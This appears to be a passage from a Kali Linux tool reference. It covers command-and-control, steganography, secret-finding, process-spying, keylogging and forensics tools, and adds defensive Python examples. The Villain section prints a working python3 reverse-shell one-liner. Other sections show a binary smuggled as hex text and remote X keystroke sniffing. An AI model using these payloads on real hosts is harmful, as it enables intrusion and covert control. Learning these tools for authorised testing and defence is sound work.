[*] Active session AMUSED_OVERCOAT (6a314c82-7821-4613-ba04-c063df2214e4)
# From the operator, run Nmap on the target host on another network through the server
sliver (AMUSED_OVERCOAT) > execute -o nmap 192.168.56.5
[*] Output:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-14 04:08 UTC
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 02:42:AC:13:00:04 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.40 seconds
Villain
Creates command-and-control channels using multiple reverse TCP shells and HoaxShell-based shells, with a multi-user mode.
■ Usage
root@kali:~# villain --help
usage: Villain.py [-h] [-p PORT] [-x HOAX_PORT] [-n REVERSE_TCP_PORT] [-f FILE_SMUGGLER_PORT] [-i] [-c CERTFILE] [-k KEYFILE] [-v] [-q]
options:
-h, --help show this help message and exit
-p PORT, --port PORT Team server port (default: 6501).
-x HOAX_PORT, --hoax-port HOAX_PORT
HoaxShell server port (default: 8080 via http, 443 via https).
-n REVERSE_TCP_PORT, --reverse-tcp-port REVERSE_TCP_PORT
Reverse TCP multi-handler port (default: 4443).
-f FILE_SMUGGLER_PORT, --file-smuggler-port FILE_SMUGGLER_PORT
Http file smuggler server port (default: 8888).
-i, --insecure Allows any Villain client (sibling server) to connect to your instance without prompting you for verification.
-c CERTFILE, --certfile CERTFILE
Path to your ssl certificate (for HoaxShell https server).
-k KEYFILE, --keyfile KEYFILE
Path to the private key for your certificate (for HoaxShell https server).
-v, --version Show program's version number and exit.
-q, --quiet Do not print the banner on startup.
■ Example
# Start the server on host 1
root@kali_1:~# villain
[Info] Initializing required services:
[0.0.0.0:6501]::Team Server
[0.0.0.0:4443]::Reverse TCP Multi-Handler
[0.0.0.0:8080]::HoaxShell Multi-Handler
[0.0.0.0:8888]::HTTP File Smuggler
Villain >
# Start the server on host 2 as well
root@kali_2:~# villain
[Info] Initializing required services:
[0.0.0.0:6501]::Team Server
[0.0.0.0:4443]::Reverse TCP Multi-Handler
[0.0.0.0:8080]::HoaxShell Multi-Handler
[0.0.0.0:8888]::HTTP File Smuggler
# Send a connection request to host 1
Villain > connect 192.168.11.3 6501
[Info] Sending request to connect...
root@kali_1:~# villain
[...]
# The connection request from host 2 arrives; approve it
[Info] Received request to connect from 192.168.11.4
[Info] Type 0829 and press ENTER to accept. You have 10 seconds.
Villain > 0829
[Info] Synchronizing servers...
[Info] Synchronized!
# Generate the payload to run on the target host (the code is printed on screen; copy and paste it by hand)
Villain > generate payload=linux/reverse_tcp/python3 lhost=192.168.56.3
Generating payload...
nohup python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.3",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")' > /dev/null 2>&1 & disown
# Run the generated payload on the target host
root@kali_3:~# ./payload
# Host 1 is notified that a session with the target host has been established
root@kali_1:~# villain
[...]
[Shell] 4e7d50-465d46-55aa6f - New session established -> 192.168.56.4 at 2024-11-28 03:53:51.
Villain >
# Host 2 is notified of the session with the target host as well
root@kali_2:~# villain
[...]
[Shell] 4e7d50-465d46-55aa6f - New session established -> 192.168.56.4 at 2024-11-28 03:53:51.
# Connect to the target host from host 2 via host 1
Villain > shell 4e7d50-465d46-55aa6f
Interactive pseudo-shell activated.
Press Ctrl + C or type "exit" to deactivate.
┌──(root㉿kali_3)-[~]
└─# hostname
kali_3
Misc Exploit
exe2hex
Encodes a binary executable into an ASCII text file.
■ Usage
root@kali:~# exe2hex --help
Usage: exe2hex [options]
Options:
-h, --help show this help message and exit
-x EXE The EXE binary file to convert
-s Read from STDIN
-b BAT BAT output file (DEBUG.exe method - x86)
-p POSH PoSh output file (PowerShell method - x86/x64)
-e URL encode the output
-r TEXT pRefix - text to add before the command on each line
-f TEXT suFfix - text to add after the command on each line
-l INT Maximum HEX values per line
-c Clones and compress the file before converting (-cc for higher
compression)
-t Create a Expect file, to automate to a Telnet session.
-w Create a Expect file, to automate to a WinEXE session.
-v Enable verbose mode
■ Example
root@kali:~# exe2hex -x hello.exe -p hello.cmd
[*] exe2hex v1.5.1
[+] Successfully wrote (PoSh) hello.cmd
# The encoded file consists of plain ASCII text
root@kali:~# cat hello.cmd
echo|set /p="">hello.hex
echo|set /p="4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000">>hello.hex
echo|set /p="504500004c0103001233fd660000000000000000e00002010b010b00005a000000080000000000003e79000000200000008000000000400000200000000200000400000000000000040000000000000000c000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000">>hello.hex
echo|set /p="e87800005300000000800000d00400000000000000000000000000000000000000a000000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e74657874000000">>hello.hex
[...]
echo|set /p="0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000">>hello.hex
powershell -Command "$h=Get-Content -readcount 0 -path './hello.hex';$l=$h[0].length;$b=New-Object byte[] ($l/2);$x=0;for ($i=0;$i -le $l-1;$i+=2){$b[$x]=[byte]::Parse($h[0].Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);$x+=1};set-content -encoding byte 'hello.exe' -value $b;Remove-Item -force hello.hex;"
Running the generated command script recreates the .exe file
Run the .exe file
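The .cmd file above contains nothing but the binary's bytes as hex, emitted one chunk per line with echo|set /p, followed by a PowerShell one-liner that converts the hex back to bytes. The following added example (not exe2hex's code) reproduces that layout in Python and, more usefully for an analyst who finds such a dropper, parses a generated script back into the original binary without executing it and checks for a PE header. The file names, the bytes-per-line default and the sample bytes are constructed.

```python
import re

# One hex line of an exe2hex batch script: echo|set /p="<hex>">hello.hex (first line, truncating)
# or echo|set /p="<hex>">>hello.hex (appending)
HEX_LINE_RE = re.compile(r'^echo\|set /p="([0-9a-fA-F]*)">>?(\S+)$')


def encode_exe2hex(data: bytes, hexfile: str = "hello.hex", exe: str = "hello.exe", per_line: int = 128) -> str:
    """Write the same batch layout exe2hex does: truncate the .hex file, append the bytes as hex
    (per_line bytes per line, an assumption), then rebuild the binary with the PowerShell one-liner."""
    hexstr = data.hex()
    lines = [f'echo|set /p="">{hexfile}']
    for i in range(0, len(hexstr), per_line * 2):
        lines.append(f'echo|set /p="{hexstr[i:i + per_line * 2]}">>{hexfile}')
    lines.append(
        "powershell -Command \"$h=Get-Content -readcount 0 -path './" + hexfile + "';"
        "$l=$h[0].length;$b=New-Object byte[] ($l/2);$x=0;"
        "for ($i=0;$i -le $l-1;$i+=2){$b[$x]=[byte]::Parse($h[0].Substring($i,2),"
        "[System.Globalization.NumberStyles]::HexNumber);$x+=1};"
        "set-content -encoding byte '" + exe + "' -value $b;Remove-Item -force " + hexfile + ";\""
    )
    return "\n".join(lines) + "\n"


def decode_exe2hex(script: str) -> bytes:
    """Recover the embedded binary from an exe2hex-style script without running it."""
    parts = []
    for line in script.splitlines():
        m = HEX_LINE_RE.match(line.strip())
        if m:
            parts.append(m.group(1))
    hexstr = "".join(parts)
    if len(hexstr) % 2:
        raise ValueError("odd number of hex digits: truncated or tampered script")
    return bytes.fromhex(hexstr)


def is_pe(data: bytes) -> bool:
    """Sanity check on the result: DOS 'MZ' magic and a 'PE\\0\\0' signature at e_lfanew (offset 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


# Constructed sample: a DOS header whose e_lfanew points at a PE signature (not a runnable program)
SAMPLE = b"MZ\x90\x00" + b"\x00" * (0x3C - 4) + (0x40).to_bytes(4, "little") + b"PE\x00\x00" + b"\x00" * 20

if __name__ == "__main__":
    script = encode_exe2hex(SAMPLE, per_line=16)
    print(script)
    print(decode_exe2hex(script) == SAMPLE, is_pe(SAMPLE))
```

Note that set-content -encoding byte exists only in Windows PowerShell 5.1; PowerShell 7 replaced it with -AsByteStream, so the generated script targets the built-in powershell.exe.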
OutGuess
A steganography tool that hides data inside PPM (Portable Pixel Map), PNM (Portable Any Map) and JPEG images.
■ Usage
root@kali:~# outguess -h
outguess [options] [<input file> [<output file>]]
-h print this usage help text and exit
-[sS] <n> iteration start, capital letter for 2nd dataset
-[iI] <n> iteration limit
-[kK] <key> key
-[dD] <name> filename of dataset
-[eE] use error correcting encoding
-p <param> parameter passed to destination data handler
-r retrieve message from data
-x <n> number of key derivations to be tried
-m mark pixels that have been modified
-t collect statistic information
-F[+-] turns statistical steganalysis foiling on/off.
The default is on.
■ Example
Before embedding the text
root@kali:~# echo "Hello World" > message.txt
root@kali:~# outguess -k "hello" -d message.txt cat.jpg cat-with-message.jpg
Reading cat.jpg....
JPEG compression quality set to 75
Extracting usable bits: 17842 bits
Correctable message size: 9400 bits, 52.68%
Encoded 'message.txt': 96 bits, 12 bytes
Finding best embedding...
[...]
After embedding the text
root@kali:~# outguess -k "hello" -r cat-with-message.jpg message-within-jpg.txt
Reading cat-with-message.jpg....
Extracting usable bits: 17842 bits
Steg retrieve: seed: 12, len: 12
root@kali:~# cat message-within-jpg.txt
Hello World
PassDetective
Scans shell command history for passwords, API keys and secrets that were typed into it by mistake.
■ Usage
root@kali:~# PassDetective --help
Usage:
PassDetective [flags]
PassDetective [command]
Available Commands:
completion Generate the autocompletion script for the specified shell
extract Extract passwords from shell history
help Help about any command
Flags:
-h, --help Help message for PassDetective
■ Example
# Search the bash history for secrets
root@kali:~# PassDetective extract --secrets --bash
===============================================================
Scan is started.
===============================================================
Stripe API Key
curl https://api.stripe.com/v1/charges -u "sk_live_012345678901234567890123" -d amount=1099 -d currency=usd -d source=tok_visa
===============================================================
Scan is finished.
===============================================================
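PassDetective is pattern matching over history lines. The following added example (not PassDetective's code) does the same for a few well-known key formats: the Stripe live key from the output above, an AWS access key ID, a GitHub token and a password passed on the command line, and it masks each match so the report does not become a second copy of the secret. The pattern list and the sample history are assumptions; the AWS key in the sample is the documented placeholder AKIAIOSFODNN7EXAMPLE.

```python
import re

# Prefix-based patterns for well-known key formats plus a generic password-on-the-command-line catch-all
# (this set is an assumption; PassDetective ships its own, larger list)
PATTERNS = {
    "Stripe live secret key": re.compile(r"\bsk_live_[0-9a-zA-Z]{24,}\b"),
    "AWS access key ID": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "GitHub personal access token": re.compile(r"\bghp_[0-9A-Za-z]{36}\b"),
    # -p<value>, -p <value>, --password=<value>: the lookbehind keeps "--profile" from matching as "-p"
    "Password on command line": re.compile(r"(?i)(?<!\S)(?:--?password|--?passwd|-p)(?:=|\s*)(\S+)"),
}


def redact(secret: str, keep: int = 4) -> str:
    """Keep a short prefix so a finding can be tied to the real credential, mask the rest."""
    return secret[:keep] + "*" * max(0, len(secret) - keep)


def scan_history(lines) -> list:
    """Return (line_number, pattern_name, redacted_secret) for every match, in file order."""
    findings = []
    for number, line in enumerate(lines, 1):
        for name, rx in PATTERNS.items():
            for m in rx.finditer(line):
                secret = m.group(1) if m.groups() else m.group(0)
                findings.append((number, name, redact(secret)))
    return findings


def scan_history_file(path: str) -> list:
    """Scan a history file such as ~/.bash_history."""
    with open(path, errors="replace") as f:
        return scan_history(f.read().splitlines())


# Constructed sample history; line 2 is the command PassDetective reported above
SAMPLE_HISTORY = [
    "ls -la",
    'curl https://api.stripe.com/v1/charges -u "sk_live_012345678901234567890123" -d amount=1099 -d currency=usd -d source=tok_visa',
    "export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE",
    "mysql -u root -pS3cretPass! dvwa",
    "git clone https://ghp_ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghij@github.com/org/repo.git",
    "cd /tmp",
]

if __name__ == "__main__":
    for number, name, masked in scan_history(SAMPLE_HISTORY):
        print(f"line {number}: {name}: {masked}")
```

The generic password pattern is the noisy one (mysql -u root -p dvwa with a prompted password will flag the database name), which is why the tool's output above is worth reading as leads rather than as a verdict.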
pspy
Monitors commands, cron jobs and other processes run by other users in real time.
■ Usage
root@kali:~# pspy --help
Usage:
pspy [flags]
Flags:
-c, --color color the printed events (default true)
--debug print detailed error messages
-d, --dirs stringArray watch these dirs
-f, --fsevents print file system events to stdout
-h, --help help for pspy
-i, --interval int scan every 'interval' milliseconds for new processes (default 100)
--ppid record process ppids
-p, --procevents print new processes to stdout (default true)
-r, --recursive_dirs stringArray watch these dirs recursively (default [/usr,/tmp,/etc,/home,/var,/opt])
-t, --truncate int truncate process cmds longer than this (default 2048)
■ Example
# SSH into the remote host and run pspy
root@kali:~# ssh hello@192.168.11.4
$ pspy
2024/11/06 07:38:53 CMD: UID=1000 PID=1303 | pspy
2024/11/06 07:38:53 CMD: UID=1000 PID=1180 | -sh
2024/11/06 07:38:53 CMD: UID=1000 PID=1179 | sshd-session: hello@pts/1
2024/11/06 07:38:53 CMD: UID=0 PID=1173 | sshd-session: hello [priv]
2024/11/06 07:38:53 CMD: UID=0 PID=1075 | sshd: /usr/sbin/sshd [listener] 0 of 10-100 startups
2024/11/06 07:38:53 CMD: UID=0 PID=1 | bash
# Commands run by another user on the remote host (here root, UID=0, while pspy itself runs as UID=1000) appear in real time
2024/11/06 07:47:13 CMD: UID=0 PID=1323 | curl http://example.com
2024/11/06 07:47:38 CMD: UID=0 PID=1325 | ping 8.8.8.8
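pspy needs no root because /proc exposes every process's UID and command line to any local user; it polls /proc at a short interval and reports PIDs it has not seen before, which is also why a command that starts and exits between two scans can be missed (pspy additionally uses inotify on directories such as /usr and /tmp to trigger extra scans, not replicated here). The following added example (not pspy's code) is a minimal poller of that kind. The /proc parsing is kept separate from the pure diff so the diff can be exercised on constructed snapshots; the interval is an assumption.

```python
import os
import time
from datetime import datetime


def parse_status(text: str) -> dict:
    """Pick the real UID and the parent PID out of /proc/<pid>/status content."""
    info = {}
    for line in text.splitlines():
        if line.startswith("Uid:"):
            info["uid"] = int(line.split()[1])
        elif line.startswith("PPid:"):
            info["ppid"] = int(line.split()[1])
    return info


def read_proc_entry(pid: int, proc: str = "/proc"):
    """Return {'uid', 'ppid', 'cmd'} for one PID, or None if it exited between listdir and read."""
    try:
        with open(f"{proc}/{pid}/status") as f:
            info = parse_status(f.read())
        with open(f"{proc}/{pid}/cmdline", "rb") as f:
            raw = f.read()
    except OSError:
        return None
    # cmdline is NUL-separated; kernel threads have an empty one
    info["cmd"] = raw.replace(b"\x00", b" ").decode(errors="replace").strip() or "?"
    return info


def snapshot(proc: str = "/proc") -> dict:
    """pid -> entry for every numeric directory under /proc."""
    snap = {}
    for name in os.listdir(proc):
        if name.isdigit():
            entry = read_proc_entry(int(name), proc)
            if entry:
                snap[int(name)] = entry
    return snap


def new_processes(previous: dict, current: dict) -> list:
    """Pure diff: PIDs present now but not before, as pspy-style (uid, pid, cmd) tuples in PID order."""
    return [(current[p]["uid"], p, current[p]["cmd"]) for p in sorted(current) if p not in previous]


def self_visible(proc: str = "/proc") -> bool:
    """Smoke check: the poller's own process shows up in its own snapshot (True on any Linux host)."""
    return os.getpid() in snapshot(proc) if os.path.isdir(f"{proc}/self") else True


def watch(interval: float = 0.1, proc: str = "/proc"):
    """Poll like pspy: print every process seen at start, then only the new ones."""
    seen = {}
    while True:
        now = snapshot(proc)
        for uid, pid, cmd in new_processes(seen, now):
            print(f"{datetime.now():%Y/%m/%d %H:%M:%S} CMD: UID={uid} PID={pid} | {cmd}")
        seen = now
        time.sleep(interval)


if __name__ == "__main__":
    watch()
```

Anything that passes a secret as an argument (the mysql -p example two tools up, curl -u, a cron job calling a script with a token) is visible to this loop from an unprivileged account, which is the lesson of the UID=0 lines above; mounting /proc with hidepid=2 is the usual mitigation.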
Raven
Receives files from remote clients over HTTP.
■ Usage
root@kali:~# raven --help
usage: raven <listening_ip> <listening_port> [--allowed-ip <allowed_client_ip>] [--upload-folder <upload_directory>] [--organize-uploads]
positional arguments:
host The IP address for our http handler to listen on
port The port for our http handler to listen on
options:
-h, --help show this help message and exit
--allowed-ip ALLOWED_IP
Restrict access to our http handler by IP address (optional)
--upload-folder UPLOAD_FOLDER
Designate the directory to save uploaded files to (default: current working directory)
--organize-uploads Organize file uploads into subfolders by remote client IP
■ Example
# Start the service on the target host
root@kali:~# raven 0.0.0.0 443
[*] Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/)
[*] Listener access is unrestricted
[*] Uploads will be saved in /root
# Send a file to the target host
root@kali:~# curl -F "file=@evil.exe" http://192.168.11.4:443
# The file is saved
root@kali:~# raven 0.0.0.0 443
[...]
192.168.11.3 - - [07/Nov/2024 08:55:36] "File saved /root/evil.exe"
Steghide
A steganography tool that can hide data in various kinds of image and audio files.
■ Usage
root@kali:~# steghide --help
the first argument must be one of the following:
embed, --embed embed data
extract, --extract extract data
info, --info display information about a cover- or stego-file
info <filename> display information about <filename>
encinfo, --encinfo display a list of supported encryption algorithms
version, --version display version information
license, --license display steghide's license
help, --help display this usage information
embedding options:
-ef, --embedfile select file to be embedded
-ef <filename> embed the file <filename>
-cf, --coverfile select cover-file
-cf <filename> embed into the file <filename>
-p, --passphrase specify passphrase
-p <passphrase> use <passphrase> to embed data
-sf, --stegofile select stego file
-sf <filename> write result to <filename> instead of cover-file
-e, --encryption select encryption parameters
-e <a>[<m>]|<m>[<a>] specify an encryption algorithm and/or mode
-e none do not encrypt data before embedding
-z, --compress compress data before embedding (default)
-z <l> using level <l> (1 best speed...9 best compression)
-Z, --dontcompress do not compress data before embedding
-K, --nochecksum do not embed crc32 checksum of embedded data
-N, --dontembedname do not embed the name of the original file
-f, --force overwrite existing files
-q, --quiet suppress information messages
-v, --verbose display detailed information
extracting options:
-sf, --stegofile select stego file
-sf <filename> extract data from <filename>
-p, --passphrase specify passphrase
-p <passphrase> use <passphrase> to extract data
-xf, --extractfile select file name for extracted data
-xf <filename> write the extracted data to <filename>
-f, --force overwrite existing files
-q, --quiet suppress information messages
-v, --verbose display detailed information
options for the info command:
-p, --passphrase specify passphrase
-p <passphrase> use <passphrase> to get info about embedded data
■ Example
Before embedding the text
root@kali:~# echo "Hello World" > message.txt
root@kali:~# steghide embed -ef message.txt -cf cat.jpg -sf cat-with-message.jpg -p hello
embedding "message.txt" in "cat.jpg"... done
writing stego file "cat-with-message.jpg"... done
After embedding the text
root@kali:~# steghide extract -sf cat-with-message.jpg -xf hidden-message.txt -p hello
wrote extracted data to "hidden-message.txt".
root@kali:~# cat hidden-message.txt
Hello World
Stegseek
Cracks a file in which Steghide embedded data by recovering the passphrase with a wordlist.
■ Usage
root@kali:~# stegseek --help
stegseek [stegofile.jpg] [wordlist.txt]
Commands:
--crack Crack a stego file using a wordlist. This is the default mode.
--seed Crack a stego file by attempting all embedding patterns.
This mode can be used to detect a file encoded by steghide.
In case the file was encoded without encryption, this mode will
even recover the embedded file.
Positional arguments:
--crack [stegofile.jpg] [wordlist.txt] [output.txt]
--seed [stegofile.jpg] [output.txt]
Keyword arguments:
-sf, --stegofile select stego file
-wl, --wordlist select the wordlist file
-xf, --extractfile select file name for extracted data
-t, --threads set the number of threads. Defaults to the number of cores.
-f, --force overwrite existing files
-v, --verbose display detailed information
-q, --quiet hide performance metrics (can improve performance)
-s, --skipdefault don't add guesses to the wordlist (empty password, filename, ...)
-n, --nocolor disable colors in output
-c, --continue continue cracking after a result has been found.
(A stego file might contain multiple embedded files)
-a, --accessible simplify the output to be more screen reader friendly
■ Example
root@kali:~# stegseek cat-with-message.jpg passwords.txt
[i] Found passphrase: "hello"
[i] Original filename: "message.txt".
[i] Extracting to "cat-with-message.jpg.out".
root@kali:~# cat cat-with-message.jpg.out
Hello World
# Embed data in the image without encryption
root@kali:~# steghide embed -ef message.txt -cf cat.jpg -sf cat-with-message.jpg -e none -p hello
# Detect whether data was embedded with steghide and, if it was embedded without encryption, extract it
root@kali:~# stegseek --seed cat-with-message.jpg -
[i] Found (possible) seed: "5f326c48"
Plain size: 44.0 Byte(s) (compressed)
Encryption Algorithm: none
Encryption Mode: cbc
[i] Original filename: "message.txt".
[i] Extracting to stdout.
Hello World
SNOW
Hides a message in ASCII text by appending whitespace to the ends of lines.
■ Usage
root@kali:~# man stegsnow
SYNOPSIS
stegsnow [ -CQS ] [ -h | --help ] [ -V | --version ] [ -p passwd ] [ -l line-len ] [ -f file | -m message ] [ infile [ outfile ]]
OPTIONS
-C Compress the data if concealing, or uncompress it if extracting.
-f message-file
The contents of this file will be concealed in the input text file.
-l line-len
When appending whitespace, stegsnow will always produce lines shorter than this value. By default it is set to 80.
-m message-string
The contents of this string will be concealed in the input text file. Note that, unless a newline is somehow included in the
string, a newline will not be printed when the message is extracted.
-p password
If this is set, the data will be encrypted with this password during concealment, or decrypted during extraction.
-Q Quiet mode. If not set, the program reports statistics such as compression percentages and amount of available storage space
used.
-S Report on the approximate amount of space available for hidden message in the text file. Line length is taken into account, but
other options are ignored.
-V, --version
Display usage information and exit.
-h, --help
Display usage information and exit.
■ Example
root@kali:~# curl https://fakerapi.it/api/v2/texts?_quantity=1\&_characters=500 | jq -r '.data[0].content' > sample.txt
# Embed the text "ハローワールド" (Hello World) in the text file
root@kali:~# stegsnow -C -m "ハローワールド" -p hello sample.txt steg-sample.txt
# Compare the difference (spaces and tabs have been appended at the ends of lines)
root@kali:~# diff -u sample.txt steg-sample.txt --color
--- sample.txt 2024-11-19 09:17:45.819427058 +0000
+++ steg-sample.txt 2024-11-19 09:20:40.697871514 +0000
@@ -1 +1,17 @@
I can't understand it myself to begin at HIS time of life. The King's argument was, that you think you could only hear whispers now and then hurried on, Alice started to her great disappointment it was very likely true.) Down, down, down. There was nothing on it in asking riddles that have no answers.' 'If you knew Time as well as I do,' said Alice loudly. 'The idea of having nothing to do." Said the mouse doesn't get out." Only I don't put my arm round your waist,' the Duchess said to the.
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
# Visualize the spaces and tabs
root@kali:~# diff --old-line-format='' --unchanged-line-format='' --new-line-format='%L' sample.txt steg-sample.txt | sed 's/\t/→/g; s/ */●/g'
→●→●→●→●→●→●→●→●→●
●→●→●→●→●→→→●→●
→●→●→●→●→●→●→●→●→●
●→●→●→●→●→●→●→●→●→●
●→●→●→●→●→●→●→●→●→●
●→●→→●→●→●→●→●→●
→→●→●→●→●→●→●→●→●
●→●→●→●→●→●→●→●→●→●
●→●→●→●→●→●→●→●→●
→●→●→●→●→●→→●→●→●
●→●→●→●→●→●→●→●→→●
●→●→●→●→●→→●→●→●→●
●→●→●→●→●→●→●→●→●→●
●→●→●→●→●→●→●→●→●
→●→●→●→→●→●→→→
→→●
root@kali:~# stegsnow -C -p hello steg-sample.txt
ハローワールド
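The diff above makes the channel visible by hand; the following is an added example (not part of stegsnow or of the original page) of a detector a defender could run over text files: it flags lines with trailing tab/space groups, estimates the payload size from SNOW's documented encoding of roughly 3 bits per tab-terminated group of up to 7 spaces, and strips the whitespace to destroy the channel. The carrier text is constructed, not real stegsnow output.

```python
"""Detect and neutralise trailing-whitespace steganography (the channel stegsnow uses).

Assumption: a normal text file has no trailing tabs or spaces, so any line
ending in whitespace, especially a tab/space mixture, is worth flagging.
"""
import re

TRAILING_WS = re.compile(r"[ \t]+$")

# Constructed sample carrier; the trailing groups imitate SNOW's layout
# (spaces between tabs) and are not output of the real tool.
CLEAN = "The quick brown fox\njumps over\nthe lazy dog\n"
STEGO = (
    "The quick brown fox\t  \t \t   \t\n"
    "jumps over\t\t  \t\n"
    "the lazy dog\n"
)


def visualize(ws: str) -> str:
    """Render trailing whitespace with the page's markers: tab -> '→', space -> '●'."""
    return ws.replace("\t", "→").replace(" ", "●")


def scan_text(text: str) -> dict:
    """Report lines with trailing whitespace and an upper-bound payload estimate."""
    findings = []
    total_tabs = 0
    for lineno, line in enumerate(text.split("\n"), start=1):
        m = TRAILING_WS.search(line)
        if not m:
            continue
        ws = m.group(0)
        tabs = ws.count("\t")
        total_tabs += tabs
        findings.append({
            "line": lineno,
            "tabs": tabs,
            "spaces": ws.count(" "),
            # tabs interleaved with spaces is the SNOW signature; editors
            # usually leave either spaces or tabs, not both
            "mixed": tabs > 0 and " " in ws,
            "visual": visualize(ws),
        })
    # SNOW stores 3 bits per tab-terminated group of 0-7 spaces, so the
    # number of tabs bounds the hidden payload (before SNOW's compression).
    est_bits = total_tabs * 3
    return {
        "lines_flagged": len(findings),
        "tab_groups": total_tabs,
        "estimated_payload_bytes": est_bits // 8,
        "suspicious": any(f["mixed"] for f in findings),
        "findings": findings,
    }


def strip_trailing_whitespace(text: str) -> str:
    """Mitigation: removing trailing whitespace destroys any SNOW payload
    while leaving the visible text unchanged."""
    return "\n".join(TRAILING_WS.sub("", line) for line in text.split("\n"))


if __name__ == "__main__":
    report = scan_text(STEGO)
    for f in report["findings"]:
        print(f"line {f['line']}: {f['visual']}")
    print(f"{report['lines_flagged']} line(s) flagged, suspicious={report['suspicious']}, "
          f"up to {report['estimated_payload_bytes']} byte(s) of payload")
```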
Xspy
A keylogger that sniffs keystrokes on a remote or local X Window server.
■ Example
# Start the keylogger against the specified target host
root@kali:~# xspy 192.168.11.4
opened 192.168.11.4:0 for snoopng
Start xterm and type keys
root@kali:~# xspy 192.168.11.4
opened 192.168.11.4:0 for snoopng
hello
Forensics Tools
Forensics
Autopsy
A GUI tool for forensic analysis that extracts files from disk images, VM files, local storage devices and other sources.
■ Usage
root@kali:~# autopsy --help
General options:
--help show this help
--jdkhome <path> path to Java(TM) 2 SDK, Standard Edition
-J<jvm_option> pass <jvm_option> to JVM
--cp:p <classpath> prepend <classpath> to classpath
--cp:a <classpath> append <classpath> to classpath
Module reload options:
--reload /path/to/module.jar install or reinstall a module JAR file
Additional module options:
-p, --listAllIngestProfiles
-i, --dataSourceObjectId <arg>
-c, --createCase
-n, --caseName <arg>
-t, --caseType <arg>
-o, --caseBaseDir <arg>
-l, --listAllDataSources
-g, --generateReports [<arg>]
-r, --runIngest [<arg>]
-a, --addDataSource
-s, --dataSourcePath <arg>
-l, --liveAutopsy [<arg>]
--modules
--refresh Refresh all catalogs
--list Prints the list of all modules, their versions and enablement status
--install <arg1>...<argN> Installs provided JAR files as modules
--disable <arg1>...<argN> Disable modules for specified codebase names
--enable <arg1>...<argN> Enable modules for specified codebase names
--update <arg1>...<argN> Updates all or specified modules
--update-all Updates all modules
--extra-uc <arg> Add a extra Update Center (URL)
--direct-disable <arg1>...<argN> Disable module immediately
Core options:
--laf <LaF classname> use given LookAndFeel class instead of the default
--fontsize <size> set the base font size of the user interface, in points
--locale <language[:country[:variant]]> use specified locale
--userdir <path> use specified directory to store user settings
--cachedir <path> use specified directory to store user cache, must be different from userdir
--nosplash do not show the splash screen
■ Example
root@kali:~# autopsy
Load a backup image and display the file list and a timeline of events (such as file accesses)
dc3dd
An extended version of GNU dd that adds on-the-fly hash computation, progress display, split output to multiple files and other features.
■ Usage
root@kali:~# dc3dd --help
------
usage:
------
dc3dd [OPTION 1] [OPTION 2] ... [OPTION N]
*or*
dc3dd [HELP OPTION]
where each OPTION is selected from the basic or advanced
options listed below, or HELP OPTION is selected from the
help options listed below.
--------------
basic options:
--------------
if=DEVICE or FILE Read input from a device or a file (see note #1
below for how to read from standard input). This
option can only be used once and cannot be
combined with ifs=, pat=, or tpat=.
ifs=BASE.FMT Read input from a set of files with base name
BASE and sequential file name extensions
conforming to the format specifier FMT (see note
#4 below for how to specify FMT). This option
can only be used once and cannot be combined with
if=, pat=, or tpat=.
of=FILE or DEVICE Write output to a file or device (see note #2
below for how to write to standard output). This
option can be used more than once (see note #3
below for how to generate multiple outputs).
hof=FILE or DEVICE Write output to a file or device, hash the
output bytes, and verify by comparing the output
hash(es) to the input hash(es). This option can
be used more than once (see note #3 below for
how to generate multiple outputs).
ofs=BASE.FMT Write output to a set of files with base name BASE
and sequential file name extensions generated from
the format specifier FMT (see note #4 below for
how to specify FMT). This option can be used more
than once (see note #3 below for how to generate
multiple outputs). Specify the maximum size of
each file in the set using ofsz=.
hofs=BASE.FMT Write output to a set of files with base name BASE
and sequential file name extensions generated from
the format specifier FMT (see note #4 below for
how to specify FMT). Hash the output files and
verify by comparing the output hash(es) to the
input hash(es). This option can be used more than
once (see note #3 below for how to generate
multiple outputs). Specify the maximum size of
each file in the set using ofsz=.
ofsz=BYTES Set the maximum size of each file in the sets of
files specified using ofs= or hofs= to
BYTES (see note #5 below). A default value for
this option may be set at compile time using
-DDEFAULT_OUTPUT_FILE_SIZE followed by the desired
value in BYTES.
hash=ALGORITHM Compute an ALGORITHM hash of the input and also
of any outputs specified using hof=, hofs=,
or fhod=, where ALGORITHM is one of md5, sha1,
sha256, or sha512. This option may be used once
for each supported ALGORITHM. Alternatively,
hashing can be activated at compile time using one
or more of -DDEFAULT_HASH_MD5,-DDEFAULT_HASH_SHA1,
-DDEFAULT_HASH_SHA256, and -DDEFAULT_HASH_SHA512.
log=FILE Log I/O statistcs, diagnostics, and total hashes
of input and output to FILE. If hlog= is not
specified, piecewise hashes of multiple file
input and output are also logged to FILE. This
option can be used more than once to generate
multiple logs.
